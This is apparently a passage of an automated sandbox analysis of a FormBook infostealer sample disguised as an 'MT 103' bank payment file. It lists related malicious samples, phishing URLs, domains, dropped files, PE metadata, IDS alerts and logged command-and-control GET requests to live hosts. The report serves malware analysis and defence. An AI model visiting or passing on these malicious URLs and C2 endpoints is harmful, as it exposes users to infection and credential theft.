	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
185.26.122.70	docs.exe	Get hash	malicious	FormBook	Browse	www.oko.events/c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F
185.26.122.70	Dekont.exe	Get hash	malicious	FormBook	Browse	www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.oko.events	docs.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
	Dekont.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
	Quotation #10091.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
	PAGO_200924.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
www.1385.net	SOA.exe	Get hash	malicious	FormBook	Browse	103.59.102.59
www.1385.net	PO401.exe	Get hash	malicious	FormBook	Browse	103.59.102.59
www.j88.travel	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.j88.travel	SOA.exe	Get hash	malicious	FormBook	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTLANDRU	docs.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
	Dekont.exe	Get hash	malicious	FormBook	Browse	185.26.122.70
	Wave.exe	Get hash	malicious	Discord Token Stealer, Orcus, SugarDump	Browse	185.37.62.158
	DFpUKTL6kg.exe	Get hash	malicious	DCRat	Browse	185.26.122.81
	http://mydpd.space/	Get hash	malicious	DCRat, PureLog Stealer	Browse	185.26.122.30
	HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe	Get hash	malicious	DCRat	Browse	185.26.122.79
	yk2Eh24FDd.exe	Get hash	malicious	Unknown	Browse	185.26.122.81
	hT0xyYJthf.exe	Get hash	malicious	Unknown	Browse	185.26.122.81
	https://hideuri.com/EXWJgm	Get hash	malicious	Unknown	Browse	185.26.122.79
	rwDENO48jg.elf	Get hash	malicious	Mirai, Moobot	Browse	185.221.215.184
CLOUDFLARENETUS	https://links.rasa.io/v1/t/eJx1kM2OgjAUhV_FsB6kpUXQ1bzAuJp9c2mvTI1Q0tvGEMO7DzCKC51t73d-em5J9JfksEl-QujpkGXR19A13sUet9q1W4iZJko-NkmLAQwEmOhbQi56jbPwiFe6YAjoXyBswS7mBiwN2nVXGCSTn838PrvPCg8EqkUiaFCFoV9Na2_x9I0Uvv6OK0yxPqMO6tlhsmpjZ8OgppCTbaKHYF33IFflk7Nm1u3LUgDjp5QXRqZ1qU0KOYNUij0T1U7ntaxeOhJ2Rk1_XJJzlsuUs5TxlfOonTf3BF5UohBl9aZCj56mjv9wjzQfV0TIXck5E_I9RBTxjh5dt8wFtQrTgMr18xzrZRzHX-Cephc=#a2FyZW4ubW9vbmV5QGJhbGxhcmRkZXNpZ25zLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Message_2477367.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	Swift_ach Complaints.sppgCQDM.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://reliant-hornes.co.uk	Get hash	malicious	HtmlDropper	Browse	104.18.95.41
	WIpGif4IRrFfamQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_ios	Get hash	malicious	Unknown	Browse	104.22.54.104
	http://ek21-cl.asp.cuenote.jp/c/pvwyaadfke3Lf8bG	Get hash	malicious	Unknown	Browse	104.18.208.173
	https://www.canva.com/design/DAGSL2lLp_4/lQGTdiRa89y3fkgkaFc-uQ/edit?utm_content=DAGSL2lLp_4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	HTMLPhisher	Browse	172.64.144.96
	Bank Payment $38,735.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

Process:	C:\Users\user\Desktop\hbwebdownload - MT 103.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.357042452875322
Encrypted:	false
SSDEEP:	24:3sWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKIl9ia8Hu:8WSU4xympgv4RIoUP7mZ9tK8NDT
MD5:	06816BCD7ADF62525649463CEF76ECE1
SHA1:	7F732D7BA4D889D39F48AD06020A4AF4462FBD97
SHA-256:	2E1618380D5C1A22FF7F071685D6FE33800FB1748B4E62DCCBCFA1D025AB13B8
SHA-512:	97D0E9633530CD40BEF0D5790AEFB4B7860FE1F5413FFDC68A68AB78FE8297ADCDA8ED9C8F909BBC1E6385853EA53043483BE79C3030159C34712B9C74EE1FD2
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iixbdcve.5it.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlg4i3j0.fxr.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otlnruqk.dpz.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wchrwihv.1ac.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.704657024148249
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	hbwebdownload - MT 103.exe
File size:	676'872 bytes
MD5:	42d6700f5272596c025308992d4fea37
SHA1:	09db89002aa3793dfbf04ace1f62eeef11086415
SHA256:	3e26ebdfbd46dadcbf46c199970362689fa6ca0e0abb65ec703ca21d08b7269f
SHA512:	e8175443f45089dc9977ff570b3214921f2a49fd9e097fca6a87494021a7a24eaff75ff497367d7ca3c675cffb321e6c9f98b3a62cbac820fca4ec73b1792e6d
SSDEEP:	12288:h54hoC7N+VZp1YFtATOWVVT+dcL/BeUO3kR:27yZAUdVT+dcdOi
TLSH:	60E4D0C03F35730ADE695A31C62ADDB992B52D68B010B9E25EDD3B9B79DC211AD0CF01
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............3... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a33a2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x91EFFE8B [Sat Aug 3 05:56:27 2047 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa334e	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa4000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa1e00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa2034	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa13a8	0xa1400	c607275bdde28d17e918c5b2f2c02798	False	0.8848943192829457	data	7.704162970307028	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa4000	0x5d4	0x600	fc98ab758316e2756fb7830bcbcf6e83	False	0.4388020833333333	data	4.172932666344551	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa6000	0xc	0x200	12191b9068be7ef9517b26ffb806a3e6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa4090	0x344	data			0.44138755980861244
RT_MANIFEST	0xa43e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T14:47:25.173197+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49717	185.26.122.70	80	TCP
2024-10-01T14:47:25.173197+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49717	185.26.122.70	80	TCP
2024-10-01T14:47:25.173197+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49717	185.26.122.70	80	TCP
2024-10-01T14:48:05.555596+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	188.114.96.3	80	TCP
2024-10-01T14:48:05.555596+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	188.114.96.3	80	TCP
2024-10-01T14:48:05.555596+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	188.114.96.3	80	TCP
2024-10-01T14:49:49.655283+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	103.59.102.59	80	TCP
2024-10-01T14:49:49.655283+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	103.59.102.59	80	TCP
2024-10-01T14:49:49.655283+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	103.59.102.59	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 14:47:24.658610106 CEST	49717	80	192.168.2.5	185.26.122.70
Oct 1, 2024 14:47:24.663430929 CEST	80	49717	185.26.122.70	192.168.2.5
Oct 1, 2024 14:47:24.663567066 CEST	49717	80	192.168.2.5	185.26.122.70
Oct 1, 2024 14:47:24.663567066 CEST	49717	80	192.168.2.5	185.26.122.70
Oct 1, 2024 14:47:24.668370008 CEST	80	49717	185.26.122.70	192.168.2.5
Oct 1, 2024 14:47:25.167685032 CEST	49717	80	192.168.2.5	185.26.122.70
Oct 1, 2024 14:47:25.173119068 CEST	80	49717	185.26.122.70	192.168.2.5
Oct 1, 2024 14:47:25.173197031 CEST	49717	80	192.168.2.5	185.26.122.70
Oct 1, 2024 14:48:05.070825100 CEST	49718	80	192.168.2.5	188.114.96.3
Oct 1, 2024 14:48:05.076159954 CEST	80	49718	188.114.96.3	192.168.2.5
Oct 1, 2024 14:48:05.076221943 CEST	49718	80	192.168.2.5	188.114.96.3
Oct 1, 2024 14:48:05.076308966 CEST	49718	80	192.168.2.5	188.114.96.3
Oct 1, 2024 14:48:05.081396103 CEST	80	49718	188.114.96.3	192.168.2.5
Oct 1, 2024 14:48:05.555167913 CEST	80	49718	188.114.96.3	192.168.2.5
Oct 1, 2024 14:48:05.555285931 CEST	49718	80	192.168.2.5	188.114.96.3
Oct 1, 2024 14:48:05.555545092 CEST	80	49718	188.114.96.3	192.168.2.5
Oct 1, 2024 14:48:05.555596113 CEST	49718	80	192.168.2.5	188.114.96.3
Oct 1, 2024 14:48:05.560075045 CEST	80	49718	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 14:46:43.496902943 CEST	60600	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:46:44.191540003 CEST	53	60600	1.1.1.1	192.168.2.5
Oct 1, 2024 14:47:04.199191093 CEST	58794	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:47:04.209518909 CEST	53	58794	1.1.1.1	192.168.2.5
Oct 1, 2024 14:47:24.371396065 CEST	51751	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:47:24.657854080 CEST	53	51751	1.1.1.1	192.168.2.5
Oct 1, 2024 14:47:44.624449968 CEST	62601	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:47:45.083254099 CEST	53	62601	1.1.1.1	192.168.2.5
Oct 1, 2024 14:48:05.050028086 CEST	56337	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:48:05.070122004 CEST	53	56337	1.1.1.1	192.168.2.5
Oct 1, 2024 14:48:25.577543020 CEST	53084	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:48:25.739841938 CEST	53	53084	1.1.1.1	192.168.2.5
Oct 1, 2024 14:49:07.027753115 CEST	59520	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:49:07.036631107 CEST	53	59520	1.1.1.1	192.168.2.5
Oct 1, 2024 14:49:27.779608011 CEST	59797	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:49:27.868623972 CEST	53	59797	1.1.1.1	192.168.2.5
Oct 1, 2024 14:49:48.514211893 CEST	61816	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:49:49.081510067 CEST	53	61816	1.1.1.1	192.168.2.5
Oct 1, 2024 14:50:10.027592897 CEST	56635	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:50:10.037533998 CEST	53	56635	1.1.1.1	192.168.2.5
Oct 1, 2024 14:50:31.589884996 CEST	50572	53	192.168.2.5	1.1.1.1
Oct 1, 2024 14:50:31.599317074 CEST	53	50572	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 14:46:43.496902943 CEST	192.168.2.5	1.1.1.1	0xc8e6	Standard query (0)	www.est-life-insurance-2507.today	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:04.199191093 CEST	192.168.2.5	1.1.1.1	0x681f	Standard query (0)	www.etangkhap99.lol	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:24.371396065 CEST	192.168.2.5	1.1.1.1	0xb97a	Standard query (0)	www.oko.events	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:44.624449968 CEST	192.168.2.5	1.1.1.1	0x66bf	Standard query (0)	www.orenzoplaybest14.xyz	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:48:05.050028086 CEST	192.168.2.5	1.1.1.1	0xc56f	Standard query (0)	www.j88.travel	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:48:25.577543020 CEST	192.168.2.5	1.1.1.1	0x14a6	Standard query (0)	www.ridges-freezers-56090.bond	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:07.027753115 CEST	192.168.2.5	1.1.1.1	0x902f	Standard query (0)	www.vto.stream	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:27.779608011 CEST	192.168.2.5	1.1.1.1	0xb5d5	Standard query (0)	www.fbpd.top	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:48.514211893 CEST	192.168.2.5	1.1.1.1	0xc7fd	Standard query (0)	www.1385.net	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:50:10.027592897 CEST	192.168.2.5	1.1.1.1	0x5393	Standard query (0)	www.nline-courses-classes-lv-1.bond	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:50:31.589884996 CEST	192.168.2.5	1.1.1.1	0xd430	Standard query (0)	www.ourhealthyourlife.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 14:46:44.191540003 CEST	1.1.1.1	192.168.2.5	0xc8e6	Name error (3)	www.est-life-insurance-2507.today	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:04.209518909 CEST	1.1.1.1	192.168.2.5	0x681f	Name error (3)	www.etangkhap99.lol	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:24.657854080 CEST	1.1.1.1	192.168.2.5	0xb97a	No error (0)	www.oko.events		185.26.122.70	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:47:45.083254099 CEST	1.1.1.1	192.168.2.5	0x66bf	Name error (3)	www.orenzoplaybest14.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:48:05.070122004 CEST	1.1.1.1	192.168.2.5	0xc56f	No error (0)	www.j88.travel		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:48:05.070122004 CEST	1.1.1.1	192.168.2.5	0xc56f	No error (0)	www.j88.travel		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:48:25.739841938 CEST	1.1.1.1	192.168.2.5	0x14a6	Name error (3)	www.ridges-freezers-56090.bond	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:07.036631107 CEST	1.1.1.1	192.168.2.5	0x902f	Name error (3)	www.vto.stream	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:27.868623972 CEST	1.1.1.1	192.168.2.5	0xb5d5	Name error (3)	www.fbpd.top	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:49:49.081510067 CEST	1.1.1.1	192.168.2.5	0xc7fd	No error (0)	www.1385.net		103.59.102.59	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:50:10.037533998 CEST	1.1.1.1	192.168.2.5	0x5393	Name error (3)	www.nline-courses-classes-lv-1.bond	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 14:50:31.599317074 CEST	1.1.1.1	192.168.2.5	0xd430	Name error (3)	www.ourhealthyourlife.shop	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.oko.events

www.j88.travel

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	185.26.122.70	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 14:47:24.663567066 CEST	168	OUT	GET /c24t/?Edg8Tp=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbO0lNj685To&iL30=-ZRd9JBXfLe8q2J HTTP/1.1 Host: www.oko.events Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49718	188.114.96.3	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 14:48:05.076308966 CEST	168	OUT	GET /c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J HTTP/1.1 Host: www.j88.travel Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
